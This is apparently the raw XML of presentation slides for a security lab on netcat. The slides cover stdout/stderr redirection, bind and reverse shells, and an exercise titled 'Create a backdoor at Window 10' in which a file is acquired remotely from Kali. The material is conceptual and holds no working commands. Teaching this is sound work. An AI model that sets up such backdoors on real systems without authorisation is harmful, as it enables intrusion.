    <dgm:cxn modelId="{1B0253C7-056D-48BC-80C0-B070DB16D7AE}" srcId="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" destId="{72304965-AB8D-4489-82F0-98561736E34A}" srcOrd="1" destOrd="0" parTransId="{2A7D5AF9-78A8-462F-91A0-7301C98E2BFD}" sibTransId="{B2AD0FB1-56B5-4CF2-A6AF-2F12B95BAFDC}"/>
    <dgm:cxn modelId="{FEAD20CC-1F6D-448B-AA59-D28FC850FDAF}" type="presOf" srcId="{72304965-AB8D-4489-82F0-98561736E34A}" destId="{A2608E3A-5506-44FA-A2BC-D08FF194DB6D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{131658CC-8BCC-442B-A076-058B4D72D08F}" srcId="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" destId="{05FDD808-7AD8-486B-AE70-F0E81ABD599E}" srcOrd="0" destOrd="0" parTransId="{72853241-254E-4364-8F6F-B8BA919C4729}" sibTransId="{C342FB4E-D51D-4D04-A6C2-79AFB821DF9C}"/>
    <dgm:cxn modelId="{5D70B8CE-E462-43E6-884B-5750840C2B49}" type="presOf" srcId="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" destId="{563F0EF0-C7FD-40E9-BF30-6750726BFA38}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FE428405-E3AA-44F2-8AD2-76D5820066BB}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{44771BE4-CA42-4347-A7D9-BFA894F7E2F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BCC762B6-3420-42D1-8FFD-2A9704FC43A3}" type="presParOf" srcId="{44771BE4-CA42-4347-A7D9-BFA894F7E2F6}" destId="{FB31EE1B-2CD8-42BA-9E6A-E6BC7151A174}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C832ED18-70A2-43CB-8BCE-769E4EFFD957}" type="presParOf" srcId="{44771BE4-CA42-4347-A7D9-BFA894F7E2F6}" destId="{1E3D7A19-3812-424C-B1CF-C1683BDC44E2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{320ABCF6-0363-405A-9153-FB2E11CB922A}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{65E265C5-14BD-478E-B996-E645DDDECCE7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A335C3F8-E0C1-4169-B914-1305A0A2478A}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{A2608E3A-5506-44FA-A2BC-D08FF194DB6D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C9618DB9-C108-46D6-9CBD-B303BA264FE9}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{A6DCAF14-153A-40B2-9DCD-09CC97694519}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BCA8AF26-E3C2-4C0D-A5D0-E59BA1557625}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{37A5C1CE-D72B-4F6E-8255-81D52EA8BEC3}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E1221A0F-CA56-4A58-82A3-7E710E945669}" type="presParOf" srcId="{37A5C1CE-D72B-4F6E-8255-81D52EA8BEC3}" destId="{27F39BC9-14A8-4576-84F7-BE4FA9E79632}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A098D6DF-D0BA-40F3-84EC-8170430E73F8}" type="presParOf" srcId="{37A5C1CE-D72B-4F6E-8255-81D52EA8BEC3}" destId="{563F0EF0-C7FD-40E9-BF30-6750726BFA38}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{17C3E5E3-9FD3-4891-97AF-558224537B03}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{68AA5B98-4F51-4752-98CA-30EFB8E4F640}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{98037618-A0C8-4455-B1B1-52E7D89564CC}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{4808E826-A5A3-4682-8810-B89CE61FEF5E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{50B800F4-140A-48DC-A9A4-3955307BC2CA}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{055CC929-4FE4-44F1-BA19-4ED5919518E9}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{99793483-BBD2-4119-B9D6-86BE43A3EE55}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{8179DEE9-E403-41F5-A87D-0181CCA6BA29}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2260E544-65E3-4C80-93D6-127B9D168652}" type="presParOf" srcId="{8179DEE9-E403-41F5-A87D-0181CCA6BA29}" destId="{3C9B6995-C30E-4801-B34B-F7FB7836995D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8CDF162E-E3A2-47C5-A323-33E3EFDB4CF6}" type="presParOf" srcId="{8179DEE9-E403-41F5-A87D-0181CCA6BA29}" destId="{0A0B1B2D-BDD7-44E8-AD23-04F0C31F2CDB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{78FB15D8-5A40-4830-892A-8CDC61C0F622}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{EE6B7A4E-ED62-4ED1-955A-93141812DCBE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2B1C1C8E-FCC1-4646-A4E3-2A5F5B75F0E8}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{460AB55F-F2D6-4D33-A421-3D88A995DED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D1A57-D364-4000-87E1-862042A86B45}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="7694506" cy="90056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Standard input/output/error devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="26377" y="26377"/>
        <a:ext cx="6646626" cy="847812"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C952050B-D692-42B2-B6C6-D9FF89C7CC10}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="644414" y="1064305"/>
          <a:ext cx="7694506" cy="900566"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="319356"/>
            <a:satOff val="-1825"/>
            <a:lumOff val="1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Network utilities use standard devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="670791" y="1090682"/>
        <a:ext cx="6411969" cy="847812"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F4D5357D-4E8C-4757-8268-C80192744DD3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1279211" y="2128610"/>
          <a:ext cx="7694506" cy="900566"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="638711"/>
            <a:satOff val="-3650"/>
            <a:lumOff val="35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Create a backdoor at Window 10/Remote File Acquisition</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1305588" y="2154987"/>
        <a:ext cx="6421587" cy="847812"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{09FD2FBB-6BDF-47D8-9E72-5B5D698C23DC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1923626" y="3192915"/>
          <a:ext cx="7694506" cy="900566"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="958067"/>
            <a:satOff val="-5475"/>
            <a:lumOff val="52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Reverse shell</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1950003" y="3219292"/>
        <a:ext cx="6411969" cy="847812"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AAE43954-22E9-4644-92C8-9F7A82CCCAFB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7109138" y="689751"/>
          <a:ext cx="585367" cy="58536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240846" y="689751"/>
        <a:ext cx="321951" cy="440489"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8658780E-DE24-42FB-9CF8-5E7F9B2B1738}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7753553" y="1754057"/>
          <a:ext cx="585367" cy="585367"/>
        </a:xfrm>
        <a:prstGeom prst="downArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 55000"/>
            <a:gd name="adj2" fmla="val 45000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:tint val="40000"/>
            <a:alpha val="90000"/>
            <a:hueOff val="505565"/>
            <a:satOff val="4983"/>
            <a:lumOff val="475"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="19050" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="505565"/>
              <a:satOff val="4983"/>
              <a:lumOff val="4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885261" y="1754057"/>
        <a:ext cx="321951" cy="440489"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{51BA17FE-5A34-42DF-BDD7-835351B0DB1D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8388350" y="2818362"/>
          <a:ext cx="585367" cy="585367"/>
        </a:xfrm>
        <a:prstGeom prst="downArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 55000"/>
            <a:gd name="adj2" fmla="val 45000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:tint val="40000"/>
            <a:alpha val="90000"/>
            <a:hueOff val="1011130"/>
            <a:satOff val="9966"/>
            <a:lumOff val="951"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="19050" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="1011130"/>
              <a:satOff val="9966"/>
              <a:lumOff val="9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520058" y="2818362"/>
        <a:ext cx="321951" cy="440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FE39A-9BA9-4D2F-85A1-DB783B7FF4B8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2470633"/>
          <a:ext cx="9618133" cy="162100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Solution</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2470633"/>
        <a:ext cx="9618133" cy="875341"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{976D2CC0-DBFD-44F6-8CD0-2010504F5D42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3313554"/>
          <a:ext cx="4809066" cy="745661"/>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a:t>Use Zenmap</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3313554"/>
        <a:ext cx="4809066" cy="745661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{14456EC4-9209-4B9A-9130-1D2B6232CD43}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4809066" y="3313554"/>
          <a:ext cx="4809066" cy="745661"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:tint val="40000"/>
            <a:alpha val="90000"/>
            <a:hueOff val="1011130"/>
            <a:satOff val="9966"/>
            <a:lumOff val="951"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="19050" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="1011130"/>
              <a:satOff val="9966"/>
              <a:lumOff val="9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a:t>netcat is integrated into Zenmap</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4809066" y="3313554"/>
        <a:ext cx="4809066" cy="745661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{840DB5AA-C142-4CA9-A04D-786A8A72D61B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="0" y="1845"/>
          <a:ext cx="9618133" cy="2493102"/>
        </a:xfrm>
        <a:prstGeom prst="upArrowCallout">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="958067"/>
            <a:satOff val="-5475"/>
            <a:lumOff val="52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Send files from Kali to Windows 10</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="0" y="1845"/>
        <a:ext cx="9618133" cy="1619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88368-8276-471A-A40A-8843C73DF173}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="389596" y="1330015"/>
          <a:ext cx="628857" cy="6288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4A0EA44-A96C-4C24-8580-64AB96E73839}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5294" y="2204481"/>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There are two places programs send output to: Standard output (stdout) and Standard Error (stderr);</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5294" y="2204481"/>
        <a:ext cx="1397460" cy="558984"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E163AF8E-1215-4D26-8A36-97DCBF7D7F1B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2031612" y="1330015"/>
          <a:ext cx="628857" cy="6288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01E6B8-4A73-4C3F-9111-284A9C8AF57F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1647311" y="2204481"/>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You can redirect these outputs to a different place (like a file);</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1647311" y="2204481"/>
        <a:ext cx="1397460" cy="558984"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1EEE94CC-2C28-4F97-8528-9C5C648E47F3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3673629" y="1330015"/>
          <a:ext cx="628857" cy="6288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320A24-EF85-4312-A899-99BBE36CD8BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3289327" y="2204481"/>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File descriptors are used to identify stdout (1) and stderr (2);</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3289327" y="2204481"/>
        <a:ext cx="1397460" cy="558984"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D16BF0E6-479D-4924-B7F5-F82D72AF8F8F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5315646" y="1330015"/>
          <a:ext cx="628857" cy="6288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576F12-437F-411F-BD19-C98DF4696C5A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4931344" y="2204481"/>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command &gt; output is just a shortcut for command 1&gt; output;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4931344" y="2204481"/>
        <a:ext cx="1397460" cy="558984"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2A920D47-CC62-4189-A54B-CD80B5B91CF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6957662" y="1330015"/>
          <a:ext cx="628857" cy="6288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BFD4AB-9F9B-4113-8DB1-4AC637568A32}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6573360" y="2204481"/>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You can use &amp;[FILE_DESCRIPTOR] to reference a file descriptor value;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6573360" y="2204481"/>
        <a:ext cx="1397460" cy="558984"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C439E1C6-CCCF-42DB-BAAB-1A534A55E923}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8599679" y="1330015"/>
          <a:ext cx="628857" cy="6288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B2FD82-F60E-46C0-8C17-15A7F5741DED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8215377" y="2204481"/>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Using 2&gt;&amp;1 will redirect stderr to whatever value is set to stdout (and 1&gt;&amp;2 will do the opposite).</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8215377" y="2204481"/>
        <a:ext cx="1397460" cy="5589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D9AAB-FAE9-4CDA-97C8-043A29EBE4A2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2470633"/>
          <a:ext cx="9618133" cy="162100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firewall etc. may block the bind shell</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2470633"/>
        <a:ext cx="9618133" cy="1621002"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{63DA1529-FF99-4C5F-AECE-7FD8E59CD8AD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="0" y="1845"/>
          <a:ext cx="9618133" cy="2493102"/>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Bind shell - attacker's machine acts as a client and victim's machine acts as a server opening up a communication port on the victim and waiting for the client to connect to it and then issue commands that will be remotely (with respect to the attacker) executed on the victim's machine. </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="0" y="1845"/>
        <a:ext cx="9618133" cy="16199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08E3A-5506-44FA-A2BC-D08FF194DB6D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="330114"/>
          <a:ext cx="9618133" cy="10773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395732" rIns="746474"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name it </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" i="1" kern="1200"/>
            <a:t>yourFisrtLastNameEvidence.txt</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="171450" lvl="1" indent="-171450" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>the content of the file “hello </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" i="1" kern="1200"/>
            <a:t>yourname!</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>”</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="330114"/>
        <a:ext cx="9618133" cy="1077300"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1E3D7A19-3812-424C-B1CF-C1683BDC44E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="480906" y="49674"/>
          <a:ext cx="6732693" cy="5608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844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>Create a file in Windows</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="508286" y="77054"/>
        <a:ext cx="6677933" cy="506120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4808E826-A5A3-4682-8810-B89CE61FEF5E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1790454"/>
          <a:ext cx="9618133" cy="10773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395732" rIns="746474"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you allow to access Windows from Kali</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="171450" lvl="1" indent="-171450" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>assume nmap is installed</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1790454"/>
        <a:ext cx="9618133" cy="1077300"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{563F0EF0-C7FD-40E9-BF30-6750726BFA38}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="480906" y="1510014"/>
          <a:ext cx="6732693" cy="5608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844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>You don’t allow to touch Windows directly after you create the file</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="508286" y="1537394"/>
        <a:ext cx="6677933" cy="506120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{460AB55F-F2D6-4D33-A421-3D88A995DED1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3250794"/>
          <a:ext cx="9618133" cy="793012"/>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395732" rIns="746474"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use command lines, e.g., nc</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3250794"/>
        <a:ext cx="9618133" cy="793012"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0A0B1B2D-BDD7-44E8-AD23-04F0C31F2CDB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="480906" y="2970354"/>
          <a:ext cx="6732693" cy="5608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844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>Remotely acquire the file from Kali</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="508286" y="2997734"/>
        <a:ext cx="6677933"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1:56:14.429"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
